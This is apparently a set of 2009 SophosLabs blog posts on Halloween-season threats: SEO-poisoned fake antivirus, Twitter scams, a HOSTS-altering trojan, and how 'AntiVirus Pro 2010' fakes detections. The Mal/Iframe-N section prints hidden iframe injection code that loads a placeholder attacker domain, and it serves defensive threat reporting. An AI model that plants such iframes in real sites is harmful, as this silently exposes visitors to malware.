SophosLabs blog

It appears that this Halloween the malware writers preferred choice of infection vector is by using SEO (Search Engine Optimization) techniques to poison popular search terms.

We at SophosLabs have seen relatively few email campaigns that exploit Halloween this year, but there have been plenty of campaigns pushing malware loaded URL’s into festive search terms.

We have various Fake AV families featuring highly:

and

Which leads to the familiar:

and

There are also families that pose as fake media codecs exploiting Halloween to push their wares:

As users wise up to the dangers of email attachments we are seeing SEO poisoning becoming a more and more popular attack vector.

Sophos detects this years nightmares variously as Mal/FakeAvJs-A, Mal/Krap-A and Mal/EncPk-LH.

Another Twitter direct message (DM) scam was happening today, but apparently this time the hook was to prey on users’ vanity. Several messages were seen with the following text:

“I lost 25lbs using this ”
“whoa this works. i feel good and look good ”
“lol it’s amazing. look and feel great with ”

When a user clicked on the link, it redirected you to this site:

All you had to do to get your “free” bottle was fill out your name, address, phone number and email. However, once you submitted that, you then get to the screen to input your billing information and input your credit card details. Why do you need to input credit card details for something that’s free? With all that information, the cybercrooks have more than enough info to commit identity theft and fraud on your card. They have your name, address, card info and you’ve even confirmed that the address you gave is the billing address too.

At the risk of sounding preachy, these pills never work. They only thing that gets “slimmer” is your wallet.

I was watching some of the activity on Twitter today and noticed a really some really odd tweets. It was only one, every couple hours and while the text “Haha, look at this vid” didn’t change, the link did. It seemed worth checking out.

I followed the link and it went to a fake YouTube page with the following text.

“This video or group may contain content that is inappropriate for some users, as flagged by YouTube’s user community. To view this video or group, please verify you are 18 or older with your cell phone”

Huh?

How does that prove anything to do with your age? I know parents who have given their young children cell phones. I’m guessing this is a great scam to get legitimate phone numbers for those “market affiliates” that call to try to sell you “long term auto insurance” and other such scams.

Definitely more tricks than treats today on Twitter.

Twitter users should be especially careful this morning as there’s a new Twitter phish campaign going on. The message that is being seen is using a known tactic where it tries to trick the user into believing there’s some content on the internet about them, whether it be a photo or a video, and tricks them to browse to the link to find out what it is. Similar tactics have been seen in messages on Facebook and even via email. The message simply states the following.

“hi. this you on here? http://blogger.djh****.com”

The good news is if you do a search on Twitter, you’ll have a hard time finding an example of the original message since there’s an overwhelming number of people tweeting to their friends warning them about this campaign. Slowly but surely, people are learning to be more cautious.

SophosLabs analysts today encountered a strange looking application called “Anonymous E-Mail Sender”.

Interested to download and try this anonymising email doohickey if you’d ever chance upon it?

If you’ve just said “Yes”, you’ve just agreed to installing a Trojan on your computer (detected by Sophos as Troj/Pasta-B).

After filling in the details and hitting the “Send” button, it appears to do what it say. A network packet trace reveals that the application does indeed perform a HTTP Post message to a server located at a Russian pornographic website(?).

Given that this application appears to have originated from Russia, I tried accessing the Russian Google website and was surprised to find that my computer was now as slow as molasses in January. What gives?

Unbeknownst to the user, while the Trojan was “chewing fat” with the remote server, it was also cooking something up and was as busy as popcorn on a skillet. It secretly modifies your HOSTS file, thereby preventing access/redirecting access to several websites (shown below).

And if you happen to be infected by this Trojan, there’s no point in crying over spilt milk or going bananas. Contact your anti-virus vendor and see if there might be a way to resolve your situation. Your vendor might already have a ready fix available.

Always update your anti-virus software and perform regular updates to your operating system and software. I know the taste of forbidden fruit always seems enticing at first but do refrain from making impulsive decisions. Avoid half-baked applications as you’ll never know when you would end up with egg on your face. Know which side your bread is buttered.

And remember, there is no such thing as a free lunch.

If an application seems even remotely suspicious, it is preferable to err on the side of caution. If it comes from an unknown source, drop it like a hot potato. I prefer my life to be one of a bowl of cherries than to one of eating humble pie all the time.

PS: I think I’ve been watching too many Masterchef/TopChef episodes… I really need to lay off the sauce. Back to the “salt” mines… :-)

“AntiVirus Pro 2010″ is one of the most infamous Fake Antivirus malware.

Usually it manages to penetrate into a user’s computer via a small downloader. Once installed, it will attempt to download further components associated with this malware. After a few minutes, it starts to display warnings about “Privacy alert! - Your system was found to be infected with intercepting programs…”

It displays a main window and offers to provide “the scan now” option and when activated, it detects non-existent malware.  These non-existent malware can range from scripts to rootkits.

Let’s look quickly at what exactly it could find. Usually, it reports about 10-20 different malware files in the Windows System folder.  We now open one of these detected files and find out what they actually are.

; "zekel.dll":
0000:  00 00 00 02 00 00 01 04  01 04 00 06 06 01 0B 03
0010:  04 0A 08 0B 01 14 0C 01  10 01 13 02 11 1C 04 04
0020:  0F 1D 20 04 15 10 20 0D  1B 20 1F 09 17 24 00 19
0030:  2B 10 02 22 1C 17 13 1F  1A 23 17 13 14 2D 21 2C
0040:  0F 35 0C 19 2E 15 30 30  44 01 0C 13 37 1B 19 2F
...
00F0:  CF AC 00 15 09 E2 6D AF  D6 B7 17 AC 9F F9 C1 28
0100:  AD E8 A3 6C 03 3C 90 40  01 87 D0 AD 92 2F 63 0C
0110:  C4 A6 9A D4 B2 E9 6B 27  E9 05 E6 6B 43 5D C2 72
0120:  84 8C D9 A4 FB 98 17 EC  09 13 27 6B 75 14 D0 3A
0130:  25 05 26 53 78 BA 05 07  2A 12 DB 2F 15 61 E2 41
...
3940:  1E 53 D9 F2 EA 74 95 1B  F8 1C 02 10 23 EE 84 BF
3950:  F3 BD F7 95 37 ; EndOfFile

Despite it’s somewhat wacky name the file “zekel.dll” is not a DLL (Dynamic Link Library) at all. It is a mostly junk file filled with random bytes.

At the first glance it is possible to notice some regularities in these “malicious” files.  For example, all files have nulls as their first and second bytes. The new few bytes - for example at offsets 0x02..0x0F seem quite small (always less than 0x0F). What about the next few bytes? - they also appear to be “limited” - for example, the bytes at offsets 0x10..0x1F are never more than 0x1F, but at the same time they look quite random.

If we scrutinize these bytes from the start of file, we can derive some approximate formula (C-notation):

for (int FilePos=0; FilePos<FileSize; FilePos++)
{
  unsigned char b= rand()%FilePos;
  write(h,&b,1);
}

We check this assumption by analysis of the real code implementation of “AntiVirus 2010.” We need to intercept the moment when it starts to open and write to these files and decide it is “malware”.

; Inside the "AntiVirus Pro 2010" - algorithm of "fake malware" generation

From the code, it appears that I was correct about how these fake detected files are created. :-)

As a final note, there were no checksums or datastamps… only random junk inside the fake threats of “AntiVirus Pro 2010″.

This morning the security researcher behind the Malware Domain List emailed me after reading Mal/Iframe-N: The next big threat? and pointed me at an interesting compromised website he had noticed.

This JavaScript is non-malicious and will neuter Iframes on a page similar to the Defensive Iframing. It appears that a malware writing team is targeting iframes and Zeus (aka ZBot). Is this the same team as those behind Bredo? Or is there a new Web-based grouping?

The Bredo and Zeus/Zbot malware families are both vying to infect your PC. If these bots are not busy spamming themselves out from an infected endpoint, with either bogus delivery invoices or forged IRS statements, they are scouring the local machine for personal information to steal, bank transactions to manipulate, among a host of other possible nefarious deeds.

But who wants to share? We have seen bots go toe-to-toe with one another before; embedding logic into their armory to block or disable other malware. As such, it comes as no surprise to have seen a recent Bredo sample with additional code to disable installed Zbots. The sample loops through the list of known Zbot executable names…

… and moves any files found to an alternate location, and thus disabling Zbot’s path-based auto-start mechanism for subsequent reboots. And to combat its own paranoia, the malware sets up a thread to perform this check (along with its own installation logic) forever.

Though disabling Zbots may seem helpful, Bredo malware does far more harm than good. As prevention is often better than the cure, be diligent in your efforts to avoid infection altogether; read e-mail with extra caution and follow safe-computing best-practices.

Since releasing detection for Mal/Iframe-N on Wednesday (21st Oct) SophosLabs have seen a rising number of detections. Detections are now into the thousands of websites affected by this threat. A couple of the sites hit are well known and one of them that I previously talked about as having been infected is the official Van Morisson site.

Even though this site is effectively down for improvement there is still an infection!

I thought that I would take some time explain a little more about this particular web threat.

What is so special about Mal/Iframe-N?

Normally, malicious Iframe’s have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isn’t a direct src= they use onload= like this:

<iframe onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes is currently appending them to the end of legitimate HTML.

This morning as I trawled the spam queues a sense of deja-vu descended on me when this subject line caught my eye:

         Update for Microsoft Outlook / Outlook Express (KB910721)

Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan? 

The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’  rather than an attached executable.     

The details have also been updated:

   Quick Details

         * File Name: officexp-KB910721-FullFile-ENU.exe
         * Version: 1.5
         * Date Published: Wed, 21 Oct 2009 16:05:06 +0100
         * Language: English
          * File Size: 100 KB

Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan.  Encore une fois.

The advice from Sophos remains the same.  Visit the genuine Microsoft update site in order to obtain your fixes.